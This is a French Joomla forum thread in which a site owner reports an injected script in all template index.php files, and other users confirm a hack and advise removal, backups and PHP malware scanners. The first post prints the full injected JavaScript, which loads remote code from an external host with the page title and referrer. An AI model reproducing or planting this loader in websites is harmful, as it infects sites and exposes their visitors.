Script bizarre dans templates ?

Réduire
X
Réduire
 
  • Page sur 1
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages
Précédent template Suivant
  • #1

    Script bizarre dans templates ?

    Bonjour,

    Mon site est lent. En naviguant via chrome je m'aperçois, en bas à gauche, que parfois un message s'affiche: "en attente de upload.jumboverlag.de".

    En recherchant dans les fichiers de tout le site je trouve dans le fichier index.php de chaque template je trouve une ligne du type:

    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://upload.jumboverlag.de/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

    S'agirait-il d'un hack? D'un simple appel d'une fonction?

    Merci de tout avis...
    Tags: Aucun
  • #2
    Re : Script bizarre dans templates ?

    Si c'est dans tous les templates et que ces templates viennent d'auteurs différents, c'est bien du code pirate.
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
    MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

    Commentaire

    • #3
      Re : Script bizarre dans templates ?

      Bonsoir

      Zéro doute. jquery.min.php est un virus ultra classique.
      Christophe (cavo789)
      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

      Commentaire

      • #4
        Re : Script bizarre dans templates ?

        Merci de vos deux retours.

        Vous pensez qu'il faut "simplement" virer ces lignes?

        Merci

        Commentaire

        • #5
          Re : Script bizarre dans templates ?

          Bonjour

          Oui, bien sûr mais comprends bien que leur présence veut dire que ton site était hacké et que tu peux donc, en toute légitimité, penser que tu trouveras d'autres bestioles.

          Si tu as un backup de ton site récent et sain, il serait bon de le récupérer puis de sécuriser le site.

          Bonne nuit.
          Christophe (cavo789)
          Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
          Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

          Commentaire

          • #6
            Re : Script bizarre dans templates ?

            Bonjour,

            A mon avis cela date de plus de 30 jours...

            On est d'accord que si d'autres fichiers étaient touchés il ne font pas forcément appel à la fonction jquery.min.php ?

            Quel retour as-tu sur les antivirus "classique" sur ce type de soucis?

            Ahlala sans ces piratages on s'ennuyerait! ;-)

            Merci

            Commentaire

            • #7
              Re : Script bizarre dans templates ?

              Bonjour

              Tu ne trouveras ce jquery.min.php que dans des fichiers index.php dans le dossier template; dans une balise script qui a été ajoutée à l'occasion, avec plusieurs lignes blanches devant cette portion de code et juste avant le tag de fin /head.

              Un antivirus classique, c'est quoi ? Un antivirus Windows ? Aucun ne détecte cette attaque car ils ne sont pas développés pour cela. C'est quoi jquery.min.php ? Juste quelques lettres avec deux points. Ce n'est pas un virus. C'est comme un formulaire d'upload à la racine de ton site Joomla, cela pourrait être normal un formulaire d'upload; aucun antivirus "classique" ne va détecter un formulaire d'upload sauf que, voilà, c'est pas normal un tel formulaire à la racine du site.

              Chez moi, j'utilise Avast Pro (version payante) et il me détecte parfois des virus dans du code php; c'est très rare; disons dans moins d'un pourcent des cas. Il me détecte p.ex. deux fichiers vérolés là où un scanner php dédié va en trouver plus de 250.
              Christophe (cavo789)
              Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
              Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

              Commentaire

              • #8
                Re : Script bizarre dans templates ?

                Merci de ces retours complets!

                Je vais utiliser aesecure_quick_scan.php qui m'a déjà donné de bons résultats. J'ai l'erreur suivante après bascule du fichier à la racine du site:
                Parse error: syntax error, unexpected T_FUNCTION, expecting ')' in /home/www/client/xxx/www/aesecure_quick_scan.php on line 154

                On est d'accord que c'est une erreur liée à la version php?

                Thanks

                Commentaire

                • #9
                  Re : Script bizarre dans templates ?

                  Oui, en principe oui, c'est symptomatique d'une erreur liée à une vieille version de PHP.

                  Il te faut minimum PHP 5.3
                  Christophe (cavo789)
                  Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                  Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                  Commentaire

                  • #10
                    Re : Script bizarre dans templates ?

                    Ca marche, merci.

                    En parrallèle j'ai scanné via OSE Anti-Virus qui de mémoire était performant aussi. Il m'a trouvé aucun des fichiers qui sont bien infectés. Bizarre... Pour vous quelle est la solution anti virale la plus peformante sur serveur? J'ai consulté pas mal de forum et je ne trouve rien de pertinent à part d'assez bons commentaires sur Centrora Security (qui est du même éditeur que OSE AV a priori)?

                    merci

                    Commentaire

                    • #11
                      Re : Script bizarre dans templates ?

                      Bonjour,

                      j'ai avancé sur ce souci. A votre avis qui est le plus performant entre CENTRORA et SECURI(.net)?

                      Merci de tout retour d'expérience ;-)

                      Commentaire

                      • #12
                        Re : Script bizarre dans templates ?

                        Bonsoir,

                        Si cela peut servir...

                        J'ai installé plusieurs couches de sécurité via plusieurs solutions.

                        En guise d'antivirus pur CENTRORA fonctionne très bien et détecte le souci que j'avais eu. Leur support est pro.

                        Bonne soirée

                        Commentaire

                        Précédent template Suivant

                        Annonce

                        Réduire
                        Aucune annonce pour le moment.

                        Partenaire de l'association

                        Réduire
                        Hébergeur Web PlanetHoster
                        Travaille ...
                        X